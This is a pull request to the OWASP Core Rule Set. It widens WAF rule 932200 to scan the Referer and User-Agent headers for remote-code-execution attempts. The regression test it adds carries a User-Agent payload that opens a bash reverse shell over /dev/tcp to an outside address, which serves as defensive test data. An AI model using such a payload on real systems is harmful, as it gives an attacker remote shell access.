### PR TITLE
fix: add headers to pl2 rule 932200

### DIFF
--- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -835,7 +835,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?:\$(?:\((?:\(.
 #
 # Regex notes: https://regex101.com/r/V6wrCO/1
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:[*?`\x5c'][^/\n]+/|\$[({\[#@!?*\-_$a-zA-Z0-9]|/[^/]+?[*?`\x5c'])" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?:[*?`\x5c'][^/\n]+/|\$[({\[#@!?*\-_$a-zA-Z0-9]|/[^/]+?[*?`\x5c'])" \
     "id:932200,\
     phase:2,\
     block,\

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: theMiddle
+  author: "theMiddle, Franziska Bühler"
   description: RCE Bypass
   enabled: true
   name: 932200.yaml
@@ -259,6 +259,22 @@ tests:
               Host: localhost
               User-Agent: OWASP ModSecurity Core Rule Set
             method: POST
+            port: 80
+            uri: /
+            version: HTTP/1.0
+          output:
+            log_contains: id "932200"
+  - test_title: 932200-17
+    desc: "RCE in request headers referer and user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
+            method: GET
             port: 80
             uri: /
             version: HTTP/1.0


### PR DESCRIPTION
This PR adds request headers referer and user-agent to pl2 rule 932200.
This PR also adds Shivam Bathla's PoC request as regression test.

For more info, also see: https://github.com/coreruleset/coreruleset/issues/2924#issuecomment-1382397292